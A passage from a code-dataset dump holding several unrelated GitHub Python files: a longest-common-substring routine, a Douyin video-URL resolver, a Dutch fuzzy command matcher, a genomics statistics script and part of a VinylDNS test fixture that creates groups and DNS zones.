1\n\t\t\telse:\n\t\t\t\treturn 0\n\t\t\n\t\t#Initializing first row and column with 0 (for ease i intialized everthing 0 :p)\n\t\tdp = [[0 for x in range(m + 1)] for y in range(n + 1)]\n\n\t\tfinal = 0\n\t\t\n\t\t#this code is a lot like longest common subsequence(only else condition is different). 
\n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(1, m + 1):\n\t\t\t\tif A[i - 1] == B[j - 1]:\n\t\t\t\t\tdp[i][j] = 1 + dp[i - 1][j - 1]\n\n\t\t\t\telse:\n\t\t\t\t\tdp[i][j] = 0\n\n\t\t\t\tfinal = max(final, dp[i][j])\n\n\t\treturn final","repo_name":"ved93/deliberate-practice-challenges","sub_path":"code-everyday-challenge/n222_longest_common_substr_lcs.py","file_name":"n222_longest_common_substr_lcs.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"21880413094","text":"import json\n\nimport requests\n\n\n# Get the real original url\ndef get_duyin_raw_url(url):\n    headers = {\n        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n                      'Chrome/65.0.3325.181 Safari/537.36'}\n    try:\n        http_result = requests.get(url, headers=headers, allow_redirects=False)\n        if http_result.status_code == 302:\n            url = http_result.headers[\"location\"]\n            video_id = get_video_id_from_url(url)\n            if len(video_id) > 0:\n                url = \"https://www.iesdouyin.com/web/api/v2/aweme/iteminfo/?item_ids=\" + video_id\n                http_result = requests.get(url, headers=headers)\n                ret_info = json.loads(http_result.content)\n                real_url = str(ret_info['item_list'][0]['video']['play_addr']['url_list'][0])\n                real_url = real_url.replace(\"playwm\", \"play\")\n                return real_url\n    except Exception:\n        pass\n\n    return \"\"\n\n\ndef get_video_id_from_url(url):\n    find_keys = \"/share/video/\"\n    find_pos = url.find(find_keys)\n    if find_pos != -1:\n        find_pos += len(find_keys)\n        new_url = url[find_pos:-1]\n        str_array = new_url.split(\"/\")\n        if len(str_array) > 0:\n            return str_array[0]\n    return \"\"\n\n\n# Process the content of the returned Url\n# Logic:\n# 1: first find playAddr: 2: then split it; the second element is the address we want\ndef process_raw_video_url(result):\n    raw_url = \"\"\n    find_url = \"playAddr: \"\n    if len(result) > 0:\n        find_pos = result.find(find_url)\n\n        if find_pos != -1:\n            new_url = result[find_pos:-1]\n            str_array = new_url.split(\"\\\"\")\n            raw_url = str_array[1]\n\n    return raw_url\n\n\ndef main():\n    test_url = \"https://v.douyin.com/vqUNVw/\"\n\n    raw_url = get_duyin_raw_url(test_url)\n    print(raw_url)\n\n\nmain()\n","repo_name":"xvsdf100/douyintool","sub_path":"DuYinTool.py","file_name":"DuYinTool.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"}
+{"seq_id":"16747903857","text":"def main(commando):\n    commando = str(commando)\n    commands = [\"ALLESONGTEKSTEN\", \"BOEK\", \"DATA\", \"FEITEN\", \"GAGILLEN\", \"LANDEN\", \"PAASDAG\", \"TEKENCORONA\", \"STOP\"]\n    procentpercommand = []\n    for command in commands:\n        bijelkaar = 0\n        letters = []\n        aantalletters = 0\n        if commando == command:\n            return command\n        for letter in commando:\n            letters.append(letter)\n        for letter in command:\n            if letter in letters:\n                bijelkaar = bijelkaar + 100\n            else:\n                bijelkaar = bijelkaar + 0\n            aantalletters = aantalletters + 1\n        procentuiteindelijk = bijelkaar / aantalletters\n        procentpercommand.append(procentuiteindelijk)\n    positie = 0\n    hoogtsteprocent = max(procentpercommand)\n    for procent in procentpercommand:\n        if procent == hoogtsteprocent:\n            break\n        else:\n            positie = positie + 1\n    if hoogtsteprocent > 69:\n        return commands[positie]\n    else:\n        return 'NIKS'","repo_name":"Abelkrijgtalles/parel-assistant","sub_path":"ai/procentcalculator.py","file_name":"procentcalculator.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
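A minimal usage sketch of the fuzzy command matcher in the record above; the import path is assumed from the record's sub_path (ai/procentcalculator.py) and is hypothetical:

# Hedged sketch: main() scores each known command by the percentage of its
# letters found in the input and returns the best scorer above 70%, else 'NIKS'.
from procentcalculator import main as match_command

print(match_command("BOEK"))   # exact match is returned immediately -> "BOEK"
print(match_command("BOEKK"))  # every letter of "BOEK" is present -> "BOEK"
print(match_command("xyz"))    # nothing scores above 70% -> "NIKS"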
+{"seq_id":"6009504606","text":"#!/usr/bin/env python3\n\nimport sys\nimport tempfile\nimport statistics\n#import numpy as np\nimport math\n\nclass Cpos_data(object):\n def __init__(self):\n self.freqs_mean = None\n self.freqs_sd = None\n self.counts_mean = None\n self.counts_sd = None\n self.freqsum = 0\n self.freqsum_sq = 0\n self.freqn = 0\n self.countsum = 0\n self.countsum_sq = 0\n self.countn = 0\n \n self.freqs_mean_het = None\n self.freqs_sd_het = None\n self.counts_mean_het = None\n self.counts_sd_het = None\n self.freqsum_het = 0\n self.freqsum_sq_het = 0\n self.freqn_het = 0\n self.countsum_het = 0\n self.countsum_sq_het = 0\n self.countn_het = 0\n \n self.freqs_mean_blood = None\n self.freqs_sd_blood = None\n self.counts_mean_blood = None\n self.counts_sd_blood = None\n self.freqsum_blood = 0\n self.freqsum_sq_blood = 0\n self.freqn_blood = 0\n self.countsum_blood = 0\n self.countsum_sq_blood = 0\n self.countn_blood = 0\n \n self.freqs_mean_het_blood = None\n self.freqs_sd_het_blood = None\n self.counts_mean_het_blood = None\n self.counts_sd_het_blood = None\n self.freqsum_het_blood = 0\n self.freqsum_sq_het_blood = 0\n self.freqn_het_blood = 0\n self.countsum_het_blood = 0\n self.countsum_sq_het_blood = 0\n self.countn_het_blood = 0\n def printme(self):\n print(self.freqsum, self.freqsum_sq, self.freqn, self.countsum, self.countsum_sq, self.countn, self.freqs_mean, self.freqs_sd, self.counts_mean, self.counts_sd, sep=\"\\n\")\n print(\"<======>\")\n def update_freqs(self, freq):\n if not freq == \"NA\":\n self.freqsum += freq\n self.freqsum_sq += (freq * freq)\n self.freqn += 1\n def update_freqs_het(self, freq):\n if not freq == \"NA\":\n self.freqsum_het += freq\n self.freqsum_sq_het += (freq * freq)\n self.freqn_het += 1\n def update_counts(self, count):\n if not count == \"NA\":\n self.countsum += count\n self.countsum_sq += (count * count)\n self.countn += 1\n def update_counts_het(self, count):\n if not count == \"NA\":\n self.countsum_het += count\n self.countsum_sq_het += (count * count)\n self.countn_het += 1\n def update_freqs_blood(self, freq):\n if not freq == \"NA\":\n self.freqsum_blood += freq\n self.freqsum_sq_blood += (freq * freq)\n self.freqn_blood += 1\n def update_freqs_het_blood(self, freq):\n if not freq == \"NA\":\n self.freqsum_het_blood += freq\n self.freqsum_sq_het_blood += (freq * freq)\n self.freqn_het_blood += 1\n def update_counts_blood(self, count):\n if not count == \"NA\":\n self.countsum_blood += count\n self.countsum_sq_blood += (count * count)\n self.countn_blood += 1\n def update_counts_het_blood(self, count):\n if not count == \"NA\":\n self.countsum_het_blood += count\n self.countsum_sq_het_blood += (count * count)\n self.countn_het_blood += 1\n def mean_sd(self):\n self.freqs_mean = meanit(self.freqsum, self.freqn)\n self.freqs_sd = sdit(self.freqsum, self.freqsum_sq, self.freqn)\n self.counts_mean = meanit(self.countsum, self.countn)\n self.counts_sd = sdit(self.countsum, self.countsum_sq, self.countn)\n self.freqs_mean_het = meanit(self.freqsum_het, self.freqn_het)\n self.freqs_sd_het = sdit(self.freqsum_het, self.freqsum_sq_het, self.freqn_het)\n self.counts_mean_het = meanit(self.countsum_het, self.countn_het)\n self.counts_sd_het = sdit(self.countsum_het, self.countsum_sq_het, self.countn_het)\n \n self.freqs_mean_blood = meanit(self.freqsum_blood, self.freqn_blood)\n self.freqs_sd_blood = sdit(self.freqsum_blood, self.freqsum_sq_blood, self.freqn_blood)\n self.counts_mean_blood = meanit(self.countsum_blood, self.countn_blood)\n 
self.counts_sd_blood = sdit(self.countsum_blood, self.countsum_sq_blood, self.countn_blood)\n self.freqs_mean_het_blood = meanit(self.freqsum_het_blood, self.freqn_het_blood)\n self.freqs_sd_het_blood = sdit(self.freqsum_het_blood, self.freqsum_sq_het_blood, self.freqn_het_blood)\n self.counts_mean_het_blood = meanit(self.countsum_het_blood, self.countn_het_blood)\n self.counts_sd_het_blood = sdit(self.countsum_het_blood, self.countsum_sq_het_blood, self.countn_het_blood)\n\ndef meanit(asum, n):\n out = \"NA\"\n if n>=1:\n out = asum / n\n return(out)\n\ndef sdit(asum, asum_sq, n):\n out = \"NA\"\n try:\n if n>= 2:\n out = math.sqrt( ((n * asum_sq) - (asum * asum)) / (n * (n-1)) )\n except ValueError:\n pass\n return(out)\n\ndef normalize(x, mean, sd):\n out = \"NA\"\n try:\n if sd > 0:\n out = (x-mean) / sd\n except TypeError:\n pass\n return(out)\n\ndef read_table():\n data = {}\n atemp = tempfile.TemporaryFile(mode=\"w+\")\n for i, l in enumerate(sys.stdin):\n if i==0:\n print(l.rstrip('\\n') + \"\\tfreq_mean\\tfreq_sd\\tcount_mean\\tcount_sd\\tfreq_mean_het\\tfreq_sd_het\\tcount_mean_het\\tcount_sd_het\\tfreq_mean_blood\\tfreq_sd_blood\\tcount_mean_blood\\tcount_sd_blood\\tfreq_mean_het_blood\\tfreq_sd_het_blood\\tcount_mean_het_blood\\tcount_sd_het_blood\\thet\\tfreq\\tfreq_nor\\tfreq_nor_het\\tcount_nor\\tcount_nor_het\\tfreq_nor_blood\\tfreq_nor_het_blood\\tcount_nor_blood\\tcount_nor_het_blood\")\n continue\n sl = l.rstrip('\\n').split('\\t')\n cpos = (sl[0], sl[1])\n hits = float(sl[-3])\n count = float(sl[-1])\n gt = sl[-4]\n het = False\n if len(gt) >= 3:\n if not gt[0] == gt[-1]:\n het = True\n blood = False\n if sl[5] == \"Blood\":\n blood = True\n if count > 0:\n freq = hits / count\n else:\n freq = \"NA\"\n if not cpos in data:\n data[cpos] = Cpos_data()\n data[cpos].update_freqs(freq)\n data[cpos].update_counts(count)\n if het:\n data[cpos].update_freqs_het(freq)\n data[cpos].update_counts_het(count)\n if blood:\n data[cpos].update_freqs_blood(freq)\n data[cpos].update_counts_blood(count)\n if het:\n data[cpos].update_freqs_het_blood(freq)\n data[cpos].update_counts_het_blood(count)\n atemp.write(l)\n return(data, atemp)\n\ndef calculate_means(data):\n for cpos, cpos_data in data.items():\n cpos_data.mean_sd()\n\ndef write_data(data, atemp):\n atemp.seek(0)\n for l in atemp:\n sl = l.rstrip('\\n').split('\\t')\n cpos = (sl[0], sl[1])\n cpos_data = data[cpos]\n hits = float(sl[-3])\n count = float(sl[-1])\n gt = sl[-4]\n het = False\n if len(gt) >= 3:\n if not gt[0] == gt[-1]:\n het = True\n if het:\n hetp = \"TRUE\"\n else:\n hetp = \"FALSE\"\n if count > 0:\n freq = hits / count\n else:\n freq = \"NA\"\n \n freq_nor = normalize(freq, cpos_data.freqs_mean, cpos_data.freqs_sd)\n freq_nor_het = normalize(freq, cpos_data.freqs_mean_het, cpos_data.freqs_sd_het)\n count_nor = normalize(count, cpos_data.counts_mean, cpos_data.counts_sd)\n count_nor_het = normalize(count, cpos_data.counts_mean_het, cpos_data.counts_sd_het)\n \n freq_nor_blood = normalize(freq, cpos_data.freqs_mean_blood, cpos_data.freqs_sd_blood)\n freq_nor_het_blood = normalize(freq, cpos_data.freqs_mean_het_blood, cpos_data.freqs_sd_het_blood)\n count_nor_blood = normalize(count, cpos_data.counts_mean_blood, cpos_data.counts_sd_blood)\n count_nor_het_blood = normalize(count, cpos_data.counts_mean_het_blood, cpos_data.counts_sd_het_blood)\n sl.append(cpos_data.freqs_mean)\n sl.append(cpos_data.freqs_sd)\n sl.append(cpos_data.counts_mean)\n sl.append(cpos_data.counts_sd)\n sl.append(cpos_data.freqs_mean_het)\n 
sl.append(cpos_data.freqs_sd_het)\n sl.append(cpos_data.counts_mean_het)\n sl.append(cpos_data.counts_sd_het)\n \n sl.append(cpos_data.freqs_mean_blood)\n sl.append(cpos_data.freqs_sd_blood)\n sl.append(cpos_data.counts_mean_blood)\n sl.append(cpos_data.counts_sd_blood)\n sl.append(cpos_data.freqs_mean_het_blood)\n sl.append(cpos_data.freqs_sd_het_blood)\n sl.append(cpos_data.counts_mean_het_blood)\n sl.append(cpos_data.counts_sd_het_blood)\n \n sl.append(hetp)\n sl.append(freq)\n sl.append(freq_nor)\n sl.append(freq_nor_het)\n sl.append(count_nor)\n sl.append(count_nor_het)\n sl.append(freq_nor_blood)\n sl.append(freq_nor_het_blood)\n sl.append(count_nor_blood)\n sl.append(count_nor_het_blood)\n print(\"\\t\".join(map(str, sl)))\n atemp.close()\n\ndef main():\n data, atemp = read_table()\n calculate_means(data)\n write_data(data, atemp)\n\nif __name__ == \"__main__\":\n main()\n\n#X\t101\t0.4\tA\tC\tBlood\tNA00001\t0\t100\t5\t105\n#X\t102\t0.4\tA\tG\tBlood\tNA00001\t0\t108\t5\t113\n#X\t103\t0.4\tGT\tTAT\tBlood\tNA00001\t0\t80\t5\t85\n#X\t101\t0.4\tA\tC\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t102\t0.4\tA\tG\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t103\t0.4\tGT\tTAT\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t101\t0.4\tA\tC\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t102\t0.4\tA\tG\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t103\t0.4\tGT\tTAT\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t101\t0.4\tA\tC\tSperm\tNA00004\t0|1\t55\t45\t100\n#X\t102\t0.4\tA\tG\tSperm\tNA00004\t0|1\t55\t45\t100\n#X\t103\t0.4\tGT\tTAT\tSperm\tNA00004\t0|1\t55\t45\t100\n","repo_name":"jgbaldwinbrown/jgbutils","sub_path":"Distortion_2019/vcf2table/getmeans.py","file_name":"getmeans.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29457497499","text":"import copy\nimport inspect\nimport logging\nfrom typing import MutableMapping, Mapping\n\nfrom tests.list_batch_summaries_test_context import ListBatchChangeSummariesTestContext\nfrom tests.list_groups_test_context import ListGroupsTestContext\nfrom tests.list_recordsets_test_context import ListRecordSetsTestContext\nfrom tests.list_zones_test_context import ListZonesTestContext\nfrom tests.test_data import TestData\nfrom utils import *\nfrom vinyldns_python import VinylDNSClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass SharedZoneTestContext(object):\n \"\"\"\n Creates multiple zones to test authorization / access to shared zones across users\n \"\"\"\n _data_cache: MutableMapping[str, MutableMapping[str, Mapping]] = {}\n\n\n def __init__(self, partition_id: str):\n self.partition_id = partition_id\n self.setup_started = False\n self.ok_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"okAccessKey\", \"okSecretKey\")\n self.dummy_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"dummyAccessKey\", \"dummySecretKey\")\n self.shared_zone_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"sharedZoneUserAccessKey\", \"sharedZoneUserSecretKey\")\n self.support_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"supportUserAccessKey\", \"supportUserSecretKey\")\n self.super_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"superUserAccessKey\", \"superUserSecretKey\")\n self.unassociated_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"listGroupAccessKey\", \"listGroupSecretKey\")\n self.test_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"testUserAccessKey\", 
\"testUserSecretKey\")\n        self.history_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"history-key\", \"history-secret\")\n        self.non_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"not-exist-key\", \"not-exist-secret\")\n        self.clients = [self.ok_vinyldns_client, self.dummy_vinyldns_client, self.shared_zone_vinyldns_client,\n                        self.support_user_client, self.super_user_client, self.unassociated_client,\n                        self.test_user_client, self.history_client, self.non_user_client]\n        self.list_zones = ListZonesTestContext(partition_id)\n        self.list_zones_client = self.list_zones.client\n        self.list_records_context = ListRecordSetsTestContext(partition_id)\n        self.list_groups_context = ListGroupsTestContext(partition_id)\n        self.list_batch_summaries_context = ListBatchChangeSummariesTestContext(partition_id)\n\n        self.dummy_group = None\n        self.ok_group = None\n        self.shared_record_group = None\n        self.history_group = None\n        self.group_activity_created = None\n        self.group_activity_updated = None\n\n        self.history_zone = None\n        self.ok_zone = None\n        self.dummy_zone = None\n        self.ip6_reverse_zone = None\n        self.ip6_16_nibble_zone = None\n        self.ip4_reverse_zone = None\n        self.classless_base_zone = None\n        self.classless_zone_delegation_zone = None\n        self.system_test_zone = None\n        self.parent_zone = None\n        self.ds_zone = None\n        self.requires_review_zone = None\n        self.shared_zone = None\n\n        self.ip4_10_prefix = None\n        self.ip4_classless_prefix = None\n        self.ip6_prefix = None\n\n\n    def setup(self):\n        if self.setup_started:\n            # Safeguard against reentrance\n            return\n        self.setup_started = True\n\n        partition_id = self.partition_id\n        try:\n            ok_group = {\n                \"name\": f\"ok-group{partition_id}\",\n                \"email\": \"test@test.com\",\n                \"description\": \"this is a description\",\n                \"members\": [{\"id\": \"ok\"}, {\"id\": \"support-user-id\"}],\n                \"admins\": [{\"id\": \"ok\"}]\n            }\n\n            self.ok_group = self.ok_vinyldns_client.create_group(ok_group, status=200)\n            # in theory this shouldn't be needed, but getting 'user is not in group' errors on zone creation\n            self.confirm_member_in_group(self.ok_vinyldns_client, self.ok_group)\n\n            dummy_group = {\n                \"name\": f\"dummy-group{partition_id}\",\n                \"email\": \"test@test.com\",\n                \"description\": \"this is a description\",\n                \"members\": [{\"id\": \"dummy\"}],\n                \"admins\": [{\"id\": \"dummy\"}]\n            }\n            self.dummy_group = self.dummy_vinyldns_client.create_group(dummy_group, status=200)\n            # in theory this shouldn't be needed, but getting 'user is not in group' errors on zone creation\n            self.confirm_member_in_group(self.dummy_vinyldns_client, self.dummy_group)\n\n            shared_record_group = {\n                \"name\": f\"record-ownergroup{partition_id}\",\n                \"email\": \"test@test.com\",\n                \"description\": \"this is a description\",\n                \"members\": [{\"id\": \"sharedZoneUser\"}, {\"id\": \"ok\"}, {\"id\": \"support-user-id\"}],\n                \"admins\": [{\"id\": \"sharedZoneUser\"}, {\"id\": \"ok\"}]\n            }\n            self.shared_record_group = self.ok_vinyldns_client.create_group(shared_record_group, status=200)\n\n            history_group = {\n                \"name\": f\"history-group{partition_id}\",\n                \"email\": \"test@test.com\",\n                \"description\": \"this is a description\",\n                \"members\": [{\"id\": \"history-id\"}],\n                \"admins\": [{\"id\": \"history-id\"}]\n            }\n            self.history_group = self.history_client.create_group(history_group, status=200)\n            self.confirm_member_in_group(self.history_client, self.history_group)\n\n            history_zone_change = self.history_client.create_zone(\n                {\n                    \"name\": f\"system-test-history{partition_id}.\",\n                    
\"email\": \"i.changed.this.1.times@history-test.com\",\n \"shared\": False,\n \"adminGroupId\": self.history_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"vinyldns.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"vinyldns.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.history_zone = history_zone_change[\"zone\"]\n\n # initialize history\n self.history_client.wait_until_zone_active(history_zone_change[\"zone\"][\"id\"])\n self.init_history()\n\n ok_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"ok{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ok.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ok.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.ok_zone = ok_zone_change[\"zone\"]\n\n dummy_zone_change = self.dummy_vinyldns_client.create_zone(\n {\n \"name\": f\"dummy{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.dummy_group[\"id\"],\n \"isTest\": True,\n \"acl\": {\n \"rules\": [\n {\n \"accessLevel\": \"Delete\",\n \"description\": \"some_test_rule\",\n \"userId\": \"history-id\"\n }\n ]\n },\n \"connection\": {\n \"name\": \"dummy.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"dummy.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.dummy_zone = dummy_zone_change[\"zone\"]\n\n self.ip6_prefix = f\"fd69:27cc:fe9{partition_id}\"\n ip6_reverse_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.9.e.f.c.c.7.2.9.6.d.f.ip6.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ip6.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ip6.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.ip6_reverse_zone = ip6_reverse_zone_change[\"zone\"]\n\n ip6_16_nibble_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": 
f\"0.0.0.1.{partition_id}.9.e.f.c.c.7.2.9.6.d.f.ip6.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"backendId\": \"func-test-backend\"\n }, status=202\n )\n self.ip6_16_nibble_zone = ip6_16_nibble_zone_change[\"zone\"]\n\n self.ip4_10_prefix = f\"10.{partition_id}\"\n ip4_reverse_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.10.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ip4.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ip4.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.ip4_reverse_zone = ip4_reverse_zone_change[\"zone\"]\n\n self.ip4_classless_prefix = f\"192.0.{partition_id}\"\n classless_base_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.0.192.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"classless-base.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"classless-base.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.classless_base_zone = classless_base_zone_change[\"zone\"]\n\n classless_zone_delegation_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"192/30.{partition_id}.0.192.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"classless.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"classless.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.classless_zone_delegation_zone = classless_zone_delegation_change[\"zone\"]\n\n system_test_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"system-test{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"system-test.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"system-test.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n 
\"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.system_test_zone = system_test_zone_change[\"zone\"]\n\n # parent zone gives access to the dummy user, dummy user cannot manage ns records\n parent_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"parent.com{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"acl\": {\n \"rules\": [\n {\n \"accessLevel\": \"Delete\",\n \"description\": \"some_test_rule\",\n \"userId\": \"dummy\"\n }\n ]\n },\n \"connection\": {\n \"name\": \"parent.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"parent.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.parent_zone = parent_zone_change[\"zone\"]\n\n # mimicking the spec example\n ds_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"example.com{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"example.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"example.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.ds_zone = ds_zone_change[\"zone\"]\n\n # zone with name configured for manual review\n requires_review_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"zone.requires.review{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"backendId\": \"func-test-backend\"\n }, status=202)\n self.requires_review_zone = requires_review_zone_change[\"zone\"]\n\n # Shared zone\n shared_zone_change = self.support_user_client.create_zone(\n {\n \"name\": f\"shared{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": True,\n \"adminGroupId\": self.shared_record_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"shared.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"shared.\",\n 